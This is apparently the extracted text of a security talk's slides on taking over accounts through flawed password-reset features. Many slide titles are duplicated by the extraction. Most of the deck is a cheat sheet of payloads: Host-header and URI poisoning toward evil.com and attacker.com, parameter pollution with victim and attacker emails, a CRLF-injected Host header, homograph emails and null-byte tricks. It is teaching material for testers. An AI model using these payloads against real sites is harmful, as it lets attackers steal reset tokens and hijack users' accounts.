Account Takeover via Exploiting Misconfigured Password Reset Feature By Tuhin Bose

Who am I?

Conclusion & QNA Conclusion & QNA What is Password What is Password Reset Feature? Reset Feature? Password Reset Password Reset Implementation Implementation Techniques Used by Techniques Used by Developers Developers ATO via Hacking ATO via Hacking Misconfigured Misconfigured Password Reset Feature Password Reset Feature AGENDA

What is Password Reset Feature?

Reset password is the action of invalidating the current password for an account on an application and then setting a new one. Most of the services have a password reset feature ("Forgot Password" service) which allows you to reset your password.

Password Reset Implementation Techniques Used by Developers

Password Reset Implementation Techniques Used by Developers

ATO via Hacking Misconfigured Password Reset Feature

Host Header Injection - Password Reset Host Header Injection - Password Reset Poisoning Poisoning 1 1. . Host: evil.com or X-Forwarded-Host: evil.com

Password Reset Poisoning Password Reset Poisoning 1 1. .

2. Modifying Request-URI 2. Modifying Request-URI POST https://attacker.com/forgot-password HTTP/1.1 POST @attacker.com/forgot-password HTTP/1.1 POST :@attacker.com/forgot-password HTTP/1.1 POST /[email protected] HTTP/1.1

2. Modifying Request-URI 2. Modifying Request-URI

2. Modifying Request-URI 2. Modifying Request-URI

3. Token leakage 3. Token leakage

3. Token leakage 3. Token leakage https://www.company.com/#/changePassword/ username/token

4. HTTP Parameter Pollution (HPP) 4. HTTP Parameter Pollution (HPP) [email protected]&[email protected] email[][email protected]&email[][email protected] [email protected]%[email protected] [email protected]|[email protected] [email protected],[email protected] [email protected]%[email protected] {"email":"[email protected]","email":"[email protected]"} {"email":["[email protected]","[email protected]"]}

4. HTTP Parameter Pollution (HPP) 4. HTTP Parameter Pollution (HPP)

4. HTTP Parameter Pollution (HPP) 4. HTTP Parameter Pollution (HPP)

5. Insecure Direct Object Reference (IDOR) 5. Insecure Direct Object Reference (IDOR) Use Param Miner to get extra parameters (or append previously known parameters) in the request. Now try IDOR.

5. Insecure Direct Object Reference 5. Insecure Direct Object Reference

6. Try homograph on password reset. 6. Try homograph on password reset. [email protected] email=victim@gmаil.com [email protected] Using Unicode: Cyrillic Small Letter A

6. Try homograph on password reset. 6. Try homograph on password reset. https://github.com/UndeadSec/EvilURL

6. Try homograph on password reset. 6. Try homograph on password reset. Steps to reproduce: 1. Create a new account with [email protected] 2. Go to password reset page and enter this email: tuhin1729@gmаil.com.xyz.burpcollaborator.net [Here "a" is different] If it's vulnerable then you'll get the password reset link to your collaborator server.

7. If they are sending an otp for password reset, 7. If they are sending an otp for password reset, try 2fa bypass techniques. try 2fa bypass techniques. https://tinyurl.com/tuhin1729-2fa

8. 8. Append a .json after the endpoint. Append a .json after the endpoint.

9. Weak Encryption 9. Weak Encryption While generating password reset tokens, sometimes developers use weak encryption algorithms. For example, sometimes they just encrypt the user-id/username of user + timestrap using some weak encryption algorithms .

POST /resetpassword?%0d%0aHost:%20attacker.com HTTP/1.1 10. 10. CRLF Injection CRLF Injection

10. 10. CRLF Injection CRLF Injection

11. Change the request method and content-type and observe how the application is responding. Original Modified

12. Append null bytes after your email and observe the response. {"email":"[email protected]"} {"email":"[email protected]%00"} %00, %0d%0a, %0d, %0a, %09, %0C, %20

More: More: https://tinyurl.com/tuhin1729-passwordreset

Twitter: @tuhin1729_ | Medium: @tuhin1729 | Instagram: @tuhin1729 Thank You! Thank You! Thank You!